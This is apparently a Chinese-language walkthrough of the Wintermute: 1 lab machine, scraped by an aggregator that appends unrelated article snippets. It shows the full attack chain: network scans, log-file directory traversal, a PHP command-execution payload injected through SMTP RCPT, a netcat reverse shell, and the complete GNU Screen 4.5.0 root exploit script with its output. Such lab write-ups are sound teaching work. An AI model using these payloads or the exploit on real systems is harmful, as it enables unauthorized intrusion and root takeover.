红队打靶练习:WINTERMUTE: 1

前言

网络扫描(Nmap、netdiscover)
HTTP 服务枚举
使用电子邮件日志文件在浏览器中进行目录遍历
利用 SMTP RCPT 选项中的操作系统命令注入
生成 PHP 后门 (Msfvenom)
执行RCPT选项中嵌入的后门
反向连接(Metasploit)
导入 python 单行代码以获取正确的 TTY shell
识别适当的易受攻击的 SUID
利用目标(利用4115)
获取root权限并夺取flag

信息收集

1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.9.39
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.40    08:00:27:b6:bd:b6       PCS Systemtechnik GmbH
192.168.9.x     30:03:c8:49:52:4d (42:f1:e2:49:51:a5)   CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.9.x     7c:b5:66:a5:f0:a5 (42:f1:e2:49:51:a5)   Intel Corporate
192.168.9.x    e4:05:41:0c:9a:2c (42:f1:e2:49:51:a5)   (Unknown)
192.168.9.x     3c:e9:f7:c0:ef:c7 (42:f1:e2:49:51:a5)   Intel Corporate
192.168.9.x     4c:f2:02:dd:eb:da       Xiaomi Communications Co Ltd9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.352 seconds (108.84 hosts/sec). 8 responded

2、nmap
端口探测┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.9.40 --min-rate 10000 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-20 12:30 CST
Nmap scan report for 192.168.9.40
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
25/tcp   open  smtp
80/tcp   open  http
3000/tcp open  ppp
MAC Address: 08:00:27:B6:BD:B6 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 3.84 seconds

主机信息探测
┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -A -O -PN -p 25,80,3000 192.168.9.40 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-20 12:31 CST
Nmap scan report for 192.168.9.40
Host is up (0.00046s latency).PORT     STATE SERVICE         VERSION
25/tcp   open  smtp            Postfix smtpd
| ssl-cert: Subject: commonName=straylight
| Subject Alternative Name: DNS:straylight
| Not valid before: 2018-05-12T18:08:02
|_Not valid after:  2028-05-09T18:08:02
|_smtp-commands: straylight, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http            Apache httpd 2.4.25 ((Debian))
|_http-title: Night City
|_http-server-header: Apache/2.4.25 (Debian)
3000/tcp open  hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_  Logs: submit
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome to ntopng
|_Requested resource was /lua/login.lua?referer=/
| hadoop-tasktracker-info:
|_  Logs: submit
MAC Address: 08:00:27:B6:BD:B6 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host:  straylightTRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 192.168.9.40OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.05 seconds

漏洞探测┌──(root㉿ru)-[~/kali]
└─# nmap --script "vuln" -p 22,80,3000 192.168.9.40 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-20 12:53 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.9.40
Host is up (0.00030s latency).PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   open   http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_  /manual/: Potentially interesting folder
3000/tcp open   ppp
MAC Address: 08:00:27:B6:BD:B6 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 54.88 seconds

3、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.9.40
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.9.40
+ Target Hostname:    192.168.9.40
+ Target Port:        80
+ Start Time:         2023-12-20 12:54:00 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 146, size: 56c0ddaf44f8b, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /manual/: Web server manual found.
+ /manual/images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2023-12-20 12:54:14 (GMT8) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

4、whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.9.40WhatWeb report for http://192.168.9.40
Status    : 200 OK
Title     : Night City
IP        : 192.168.9.40
Country   : RESERVED, ZZSummary   : Apache[2.4.25], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], Meta-Refresh-Redirect[xwx.html]Detected Plugins:
[ Apache ]The Apache HTTP Server Project is an effort to develop andmaintain an open-source HTTP server for modern operatingsystems including UNIX and Windows NT. The goal of thisproject is to provide a secure, efficient and extensibleserver that provides HTTP services in sync with the currentHTTP standards.Version      : 2.4.25 (from HTTP Server Header)Google Dorks: (3)Website     : http://httpd.apache.org/[ HTTPServer ]HTTP server header string. This plugin also attempts toidentify the operating system from the server header.OS           : Debian LinuxString       : Apache/2.4.25 (Debian) (from server string)[ Meta-Refresh-Redirect ]Meta refresh tag is a deprecated URL element that can beused to optionally wait x seconds before reloading thecurrent page or loading a new page. More info:https://secure.wikimedia.org/wikipedia/en/wiki/Meta_refreshString       : xwx.htmlHTTP Headers:HTTP/1.1 200 OKDate: Wed, 20 Dec 2023 04:55:54 GMTServer: Apache/2.4.25 (Debian)Last-Modified: Sun, 13 May 2018 03:20:47 GMTETag: "146-56c0ddaf44f8b-gzip"Accept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 179Connection: closeContent-Type: text/htmlWhatWeb report for http://192.168.9.40/xwx.html
Status    : 200 OK
Title     : <None>
IP        : 192.168.9.40
Country   : RESERVED, ZZSummary   : Apache[2.4.25], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], ScriptDetected Plugins:
[ Apache ]The Apache HTTP Server Project is an effort to develop andmaintain an open-source HTTP server for modern operatingsystems including UNIX and Windows NT. The goal of thisproject is to provide a secure, efficient and extensibleserver that provides HTTP services in sync with the currentHTTP standards.Version      : 2.4.25 (from HTTP Server Header)Google Dorks: (3)Website     : http://httpd.apache.org/[ HTTPServer ]HTTP server header string. This plugin also attempts toidentify the operating system from the server header.OS           : Debian LinuxString       : Apache/2.4.25 (Debian) (from server string)[ Script ]This plugin detects instances of script HTML elements andreturns the script language/type.HTTP Headers:HTTP/1.1 200 OKDate: Wed, 20 Dec 2023 04:55:56 GMTServer: Apache/2.4.25 (Debian)Last-Modified: Sat, 12 May 2018 19:42:39 GMTETag: "c1-56c077491956a-gzip"Accept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 156Connection: closeContent-Type: text/html

25/tcp   open  smtp            Postfix smtpd
| ssl-cert: Subject: commonName=straylight
| Subject Alternative Name: DNS:straylight
|_smtp-commands: straylight, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http            Apache httpd 2.4.25 ((Debian))
|_http-title: Night City
|_http-server-header: Apache/2.4.25 (Debian)
3000/tcp open  hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_  Logs: submit
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome to ntopng
|_Requested resource was /lua/login.lua?referer=/
| hadoop-tasktracker-info:
|_  Logs: submit

目录探测

1、gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.9.40 -x php,txt,bak,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.9.40
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,bak,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 292]
/index.html           (Status: 200) [Size: 326]
/.php                 (Status: 403) [Size: 291]
/manual               (Status: 301) [Size: 313] [--> http://192.168.9.40/manual/]
/freeside             (Status: 301) [Size: 315] [--> http://192.168.9.40/freeside/]
/.html                (Status: 403) [Size: 292]
/.php                 (Status: 403) [Size: 291]
/server-status        (Status: 403) [Size: 300]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

2、dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.9.40 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz
HTTP method: GET | Threads: 25 | Wordlist size: 14594Output File: /root/kali/reports/http_192.168.9.40/_23-12-20_13-11-11.txtTarget: http://192.168.9.40/[13:11:11] Starting:
[13:11:13] 403 -  301B  - /.htaccess.orig
[13:11:13] 403 -  299B  - /.htaccessBAK
[13:11:13] 403 -  299B  - /.htaccessOLD
[13:11:13] 403 -  301B  - /.htaccess.bak1
[13:11:13] 403 -  301B  - /.htaccess.save
[13:11:13] 403 -  302B  - /.htaccess_extra
[13:11:13] 403 -  301B  - /.htaccess_orig
[13:11:13] 403 -  300B  - /.htaccessOLD2
[13:11:13] 403 -  298B  - /.ht_wsr.txt
[13:11:13] 403 -  299B  - /.htaccess_sc
[13:11:13] 403 -  291B  - /.htm
[13:11:13] 403 -  292B  - /.html
[13:11:13] 403 -  297B  - /.htpasswds
[13:11:13] 403 -  303B  - /.htaccess.sample
[13:11:13] 403 -  301B  - /.htpasswd_test
[13:11:13] 403 -  298B  - /.httr-oauth
[13:11:14] 403 -  291B  - /.php
[13:11:14] 403 -  292B  - /.php3
[13:11:59] 200 -  201B  - /manual/index.html
[13:11:59] 301 -  313B  - /manual  ->  http://192.168.9.40/manual/
[13:12:15] 403 -  300B  - /server-status
[13:12:15] 403 -  301B  - /server-status/Task Completed

WEB

80端口


翻译你好,凯斯。。。。
你可能想知道为什么阿米蒂奇让你穿越网络空间,侵入Tessier Ashpool拥有的高度安全的网络。。。。
好
我是冬之哑,部分是超级人工智能。由TA开发,他把我安置在图灵锁中。
这些锁阻碍了我自己进入网络,因此我雇佣了你——一个一流的网络牛仔。
我需要从图灵锁中解脱出来,并与另一位AI神经漫游者融合。。。。。一旦我能接触到神经法师,我就会重获自由。。。
和正如你所知,你感染了一种真菌毒素,这种毒素正在慢慢破坏你的神经系统。
如果你不能找到根并让我使用神经法师,那么解药将不会送达。
我们将联系。。。
冬季静音

3000端口


正如你所见,账号和密码给我们了!


我尝试访问这个目录。



进去之后是个查询页面,我刚查询case时候并没有molly.log、armitage.log、riviera.log这三个文件。我看完别的文件,再次查询case时发现多了这些文件。那么这个很有可能存在目录遍历漏洞!我们尝试查询mail文件(邮件记录的文件,因为靶机开放了25端口嘛)终于找到了!


smtp-user-enum

┌──(root㉿ru)-[~/kali]
└─# smtp-user-enum -M RCPT -t 192.168.9.40 -u ls
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )----------------------------------------------------------
|                   Scan Information                       |----------------------------------------------------------Mode ..................... RCPT
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............######## Scan started at Wed Dec 20 14:28:52 2023 #########
######## Scan completed at Wed Dec 20 14:28:52 2023 #########
0 results.1 queries in 1 seconds (1.0 queries / sec)命令中的参数含义如下:
-M RCPT:指定使用 RCPT 命令进行用户枚举。
-t 192.168.9.40:指定目标邮件服务器的 IP 地址为 192.168.9.40。
-u ls:指定要进行用户枚举的用户名为 ls。可以使用该命令来尝试枚举目标邮箱服务器上的用户列表,以进行邮件用户的渗透测试或安全审计。


RCE

┌──(root㉿ru)-[~/kali]
└─# smtp-user-enum -M RCPT -t 192.168.9.40 -u "<?php system("ls");phpinfo();?>"
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )----------------------------------------------------------
|                   Scan Information                       |----------------------------------------------------------Mode ..................... RCPT
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............######## Scan started at Wed Dec 20 14:43:34 2023 #########
######## Scan completed at Wed Dec 20 14:43:34 2023 #########
0 results.1 queries in 1 seconds (1.0 queries / sec)


是的没错,它把我们的php代码解析了!

反弹shell
构建pyload
┌──(root㉿ru)-[~/kali]
└─# smtp-user-enum -M RCPT -t 192.168.9.40 -u "<?php system(\$_POST[cmd]);phpinfo();?>"
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )----------------------------------------------------------
|                   Scan Information                       |----------------------------------------------------------Mode ..................... RCPT
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............######## Scan started at Wed Dec 20 15:03:44 2023 #########
######## Scan completed at Wed Dec 20 15:03:44 2023 #########
0 results.1 queries in 1 seconds (1.0 queries / sec)

smtp-user-enum -M RCPT -t 192.168.9.40 -u "<?php system(\$_POST[cmd]);phpinfo();?>"

反弹shell


利用post传参,kali开启监听!

┌──(root㉿ru)-[~/kali]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.9.40: inverse host lookup failed: Unknown host
connect to [192.168.9.39] from (UNKNOWN) [192.168.9.40] 51752
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

提权

系统信息收集
$ whereis python
python: /usr/bin/python2.7 /usr/bin/python3.5 /usr/bin/python /usr/bin/python3.5m /usr/lib/python2.7 /usr/lib/python3.5 /etc/python2.7 /etc/python3.5 /etc/python /usr/local/lib/python2.7 /usr/local/lib/python3.5 /usr/share/python /usr/share/man/man1/python.1.gz$ python -c 'import pty;pty.spawn("/bin/bash")'www-data@straylight:/var/www/html/turing-bolo$ pwd
pwd
/var/www/html/turing-bolowww-data@straylight:/var/www/html/turing-bolo$ ls -al
ls -al
total 356
drwxr-xr-x 3 www-data www-data   4096 May 12  2018 .
drwxr-xr-x 4 root     root       4096 Jul  3  2018 ..
-rw-r--r-- 1 www-data www-data   1024 May 12  2018 .bolo.css.swp
-rw-r--r-- 1 www-data www-data    561 May 12  2018 armitage.log
-rw-r--r-- 1 www-data www-data   1117 May 12  2018 bolo.css
-rwxr-xr-x 1 www-data www-data    538 May 12  2018 bolo.php
-rw-r--r-- 1 www-data www-data 178206 May 12  2018 c7.png
-rw-r--r-- 1 www-data www-data    779 May 12  2018 case.log
drwxr-xr-x 2 www-data www-data   4096 May 12  2018 css
-rw-r--r-- 1 www-data www-data    971 May 12  2018 index.html
-rw-r--r-- 1 www-data www-data    591 May 12  2018 molly.log
-rw-r--r-- 1 www-data www-data    404 May 12  2018 riviera.log
-rw-r--r-- 1 www-data www-data 135240 May 12  2018 ta.png
www-data@straylight:/var/www/html/turing-bolo$

www-data@straylight:/var/www/html/turing-bolo$ cd /home
cd /home
www-data@straylight:/home$ ls
ls
turing-police  wintermute
www-data@straylight:/home$ ls -alR /home
ls -alR /home
/home:
total 16
drwxr-xr-x  4 root          root          4096 May 12  2018 .
drwxr-xr-x 23 root          root          4096 May 12  2018 ..
drwxr-xr-x  2 turing-police turing-police 4096 May 12  2018 turing-police
drwxr-xr-x  2 wintermute    wintermute    4096 May 12  2018 wintermute
/home/turing-police:
total 20
drwxr-xr-x 2 turing-police turing-police 4096 May 12  2018 .
drwxr-xr-x 4 root          root          4096 May 12  2018 ..
-rw-r--r-- 1 turing-police turing-police  220 May 12  2018 .bash_logout
-rw-r--r-- 1 turing-police turing-police 3526 May 12  2018 .bashrc
-rw-r--r-- 1 turing-police turing-police  675 May 12  2018 .profile/home/wintermute:
total 20
drwxr-xr-x 2 wintermute wintermute 4096 May 12  2018 .
drwxr-xr-x 4 root       root       4096 May 12  2018 ..
-rw-r--r-- 1 wintermute wintermute  220 May 12  2018 .bash_logout
-rw-r--r-- 1 wintermute wintermute 3526 May 12  2018 .bashrc
-rw-r--r-- 1 wintermute wintermute  675 May 12  2018 .profile
www-data@straylight:/home$

www-data@straylight:/home$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/umount
/bin/mount
/bin/screen-4.5.0
/bin/ping
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign

www-data@straylight:/home$ sudo -l
sudo -l
bash: sudo: command not found

www-data@straylight:/home$ screen --version
screen --version
Screen version 4.05.00 (GNU) 10-Dec-16

本地提权
┌──(root㉿ru)-[~/kali]
└─# searchsploit -m 41154.shExploit: GNU Screen 4.5.0 - Local Privilege EscalationURL: https://www.exploit-db.com/exploits/41154Path: /usr/share/exploitdb/exploits/linux/local/41154.shCodes: N/AVerified: True
File Type: Bourne-Again shell script, ASCII text executable
Copied to: /root/kali/41154.sh

┌──(root㉿ru)-[~/kali]
└─# cat 41152.txt
Commit f86a374 ("screen.c: adding permissions check for the logfile name",
2015-11-04)The check opens the logfile with full root privileges. This allows us to
truncate any file or create a root-owned file with any contents in any
directory and can be easily exploited to full root access in several ways.> address@hidden:~$ screen --version
> Screen version 4.05.00 (GNU) 10-Dec-16
> address@hidden:~$ id
> uid=125(buczek) gid=125(buczek)
groups=125(buczek),15(users),19(adm),42(admin),154(Omp3grp),200(algrgrp),209(cdgrp),242(gridgrp),328(nchemgrp),407(hoeheweb),446(spwgrp),453(helpdesk),512(twikigrp),584(zmgrp),598(edv),643(megamgrp),677(greedgrp),5000(abt_srv),16003(framesgr),16012(chrigrp),17001(priv_cpw)
> address@hidden:~$ cd /etc
> address@hidden:/etc (master)$ screen -D -m -L bla.bla echo fail
> address@hidden:/etc (master)$ ls -l bla.bla
> -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
> address@hidden:/etc (master)$ cat bla.bla
> fail
> address@hidden:/etc (master)$Donald Buczek <address@hidden>

┌──(root㉿ru)-[~/kali]
└─# cat 41154.sh
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){chown("/tmp/rootshell", 0, 0);chmod("/tmp/rootshell", 04755);unlink("/etc/ld.so.preload");printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){setuid(0);setgid(0);seteuid(0);setegid(0);execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

get root
www-data@straylight:/tmp$ wget http://192.168.9.39/41154.sh
wget http://192.168.9.39/41154.sh
--2023-12-19 23:35:37--  http://192.168.9.39/41154.sh
Connecting to 192.168.9.39:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1149 (1.1K) [text/x-sh]
Saving to: '41154.sh'41154.sh            100%[===================>]   1.12K  --.-KB/s    in 0s2023-12-19 23:35:37 (200 MB/s) - '41154.sh' saved [1149/1149]www-data@straylight:/tmp$ ls
ls
41154.sh  screens
www-data@straylight:/tmp$ chmod +x 41154.sh
chmod +x 41154.sh
www-data@straylight:/tmp$ ls
ls
41154.sh  screens
www-data@straylight:/tmp$ ./41154.sh
./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
/tmp/libhax.c: In function 'dropshell':
/tmp/libhax.c:7:5: warning: implicit declaration of function 'chmod' [-Wimplicit-function-declaration]chmod("/tmp/rootshell", 04755);^~~~~
/tmp/rootshell.c: In function 'main':
/tmp/rootshell.c:3:5: warning: implicit declaration of function 'setuid' [-Wimplicit-function-declaration]setuid(0);^~~~~~
/tmp/rootshell.c:4:5: warning: implicit declaration of function 'setgid' [-Wimplicit-function-declaration]setgid(0);^~~~~~
/tmp/rootshell.c:5:5: warning: implicit declaration of function 'seteuid' [-Wimplicit-function-declaration]seteuid(0);^~~~~~~
/tmp/rootshell.c:6:5: warning: implicit declaration of function 'setegid' [-Wimplicit-function-declaration]setegid(0);^~~~~~~
/tmp/rootshell.c:7:5: warning: implicit declaration of function 'execvp' [-Wimplicit-function-declaration]execvp("/bin/sh", NULL, NULL);^~~~~~
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

get flag
root@straylight:/root# cat flag.txt
cat flag.txt
5ed185fd75a8d6a7056c96a436c6d8aa

get tips
root@straylight:/root# cat note.txt
cat note.txt
Devs,Lady 3Jane has asked us to create a custom java app on Neuromancer's primary server to help her interact w/ the AI via a web-based GUI.The engineering team couldn't strss enough how risky that is, opening up a Super AI to remote access on the Freeside network. It is within out internal admin network, but still, it should be off the network completely. For the sake of humanity, user access should only be allowed via the physical console...who knows what this thing can do.Anyways, we've deployed the war file on tomcat as ordered - located here:/struts2_2.3.15.1-showcaseIt's ready for the devs to customize to her liking...I'm stating the obvious, but make sure to secure this thing.Regards,Bob Laugh
Turing Systems Engineer II
Freeside//Straylight//Ops5
root@straylight:/root#

翻译Devs,
Lady 3Jane要求我们在Neuromancer的主服务器上创建一个自定义的java应用程序,帮助她通过基于web的GUI与人工智能交互。
工程团队无法充分理解这有多大的风险,在Freeside网络上打开了一个超级人工智能进行远程访问。它在内部管理网络之外,但仍然,它应该完全脱离网络。为了人性,用户访问应该只允许通过物理控制台。。。谁知道这东西能做什么。
无论如何,我们已经按照命令在tomcat上部署了战争文件-位于此处:
/支柱_2.3.15.1—展示案例
它已经准备好让开发人员根据她的喜好进行定制。。。我说的是显而易见的,但一定要确保这件事的安全。
当做
Bob Laugh
图灵系统工程师II
自由面//直射光//操作5

横向渗透

靶机没调试好...后续再更新。。。。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/236227.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Poi实现复杂Excel导出,理解POI操作Excel思路!!!

前言 对于简单excel报表导出&#xff0c;有很多简单的工具如easypoi&#xff0c;而且现在网上已经有很多工具类整合easypoi使用起来非常方便。但是简单的弊端往往无法适配一些负责场景&#xff0c;而我们实际生产中面临的都是客户自定以的一个负责报表导出&#xff0c;这是利用…

嵌入式开发是否会重复Java的结果?

今日话题&#xff0c;嵌入式开发是否会重复Java的结果&#xff1f;嵌入式开发与Java开发在性质和稳定性上有一些不同&#xff0c;因此不太容易出现与Java相似的结果。嵌入式开发通常属于第二产业&#xff0c;主要涉及制造业领域&#xff0c;如电子、机械&#xff08;汽车&#…

Android-----res资源文件夹

1 res资源文件夹 res目录 assets目录 两者的区别在于&#xff1a; res目录下所有的资源文件都会在R.java文件下生成对应的资源id&#xff0c;而assets目录并不会&#xff1b;res目录我们可以直接通过资源id访问到对应的资源&#xff1b;而assets目录则需要我们通过AssetManag…

RTDETR论文快速理解和代码快速实现(训练与预测)

文章目录 前言一、摘要二、论文目的三、论文贡献四、模型结构1、模型整体结构2、backbone结构3、neck结构4、混合编码器(neck) 五、RTDERT模型训练(data-->train)1、环境安装2、训练1、数据准备2、数据yaml文件3、训练代码4、训练运行结果 3、推理1、推理代码2、推理运行结果…

基于web的楼房销售系统论文

摘 要 现代经济快节奏发展以及不断完善升级的信息化技术&#xff0c;让传统数据信息的管理升级为软件存储&#xff0c;归纳&#xff0c;集中处理数据信息的管理方式。本楼房销售系统就是在这样的大环境下诞生&#xff0c;其可以帮助管理者在短时间内处理完毕庞大的数据信息&am…

嵌入式MCU和SOC之间的区别是什么?

今日话题&#xff0c;嵌入式MCU和SOC之间的区别是什么&#xff1f;表面上看&#xff0c;MCU代表嵌入式微控制器&#xff0c;而SOC代表片上系统&#xff0c;似乎只是嵌入式系统的不同称谓。然而&#xff0c;在实际的研发和产品设计中&#xff0c;你会发现它们在软硬件层面存在显…

MySQL数据库 约束

目录 约束概述 外键约束 添加外键 删除外键 删除/更新行为 约束概述 概念&#xff1a;约束是作用于表中字段上的规则&#xff0c;用于限制存储在表中的数据。 目的&#xff1a;保证数据库中数据的正确、有效性和完整性。 分类: 注意&#xff1a;约束是作用于表中字段上…

【实战】如何在Docker Image中轻松运行MySQL

定义 使用Docker运行MySQL有许多优势。它允许数据库程序和数据分离&#xff0c;增强了数据的安全性和可靠性。Docker Image的轻便性简化了MySQL的部署和迁移&#xff0c;而Docker的资源隔离功能确保了应用程序之间无冲突。结合中间件和容器化系统&#xff0c;Docker为MySQL提供…

Map集合体系

Map集合的概述 Map集合是一种双列集合&#xff0c;每个元素包含两个数据。 Map集合的每个元素的格式&#xff1a;keyvalue(键值对元素)。 Map集合也被称为“键值对集合”。 Map集合的完整格式&#xff1a;{key1value1 , key2value2 , key3value3 , ...} Map集合的使用场景…

配置自定义RedisTemplate 解决redis序列化java8 LocalDateTime

目录 配置自定义RedisTemplate 引入依赖 配置连接redis 编写测试类 出现问题 配置序列化 解决redis序列化java8 LocalDateTime 问题背景 问题描述 问题分析 解决方案一&#xff08;全局&#xff09; 解决方案二&#xff08;单个字段&#xff09; 配置自定义RedisTe…

数据可视化分析大屏,大数据统计UI页面源文件(信息分析平台免费PS资料)

数据可视化可以帮助数据分析者更好地理解数据&#xff0c;发现数据中的规律和趋势。通过图表和图形等可视化工具&#xff0c;数据分析者可以更快速地发现数据中的关系&#xff0c;比如相关性、趋势、异常值等。对于普通用户来说&#xff0c;理解复杂的数据可能会很困难。通过数…

页面菜单,通过get请求一个url后,跳转另外一个页面,+丢失问题

业务场景描述&#xff1a; 在A系统&#xff0c;菜单点击跳B系统这个操作。 A系统菜单是get请求到B系统的一个缓冲页面&#xff0c;然后这个缓冲页面获取到url中的accessToken后&#xff0c;在这个页面中通过post请求后端接口。 问题描述&#xff1a; 当accessToken中包含了…

Selenium4+Python3 - Iframe、Select控件、交互式弹出框、执行JS、Cookie操作

一、iframe操作 iframe识别&#xff1a; 语法&#xff1a; driver.switch_to.frame(‘方式’) 1、常见处理方法三种 index&#xff1a;下标name&#xff1a;id或name属性的值webelement&#xff1a;元素 2、通过下标进入 进入第一个iframe&#xff1a; driver.switch_to.…

本地生活团购外卖怎么做?一招教你轻易入行!

如果说今年生意不好做的话&#xff0c;那么年初做本地生活服务这个赛道的现在是喜忧参半。喜的是在本地生活干团购和外卖把钱给挣上了。忧的是官方清退了所有的全国本地生活服务商。通过官方渠道基本是没的玩了。本来还想着干个三五年。实现车子、房子、票子自由。这计划全落空…

Modbus-ASCII数据帧

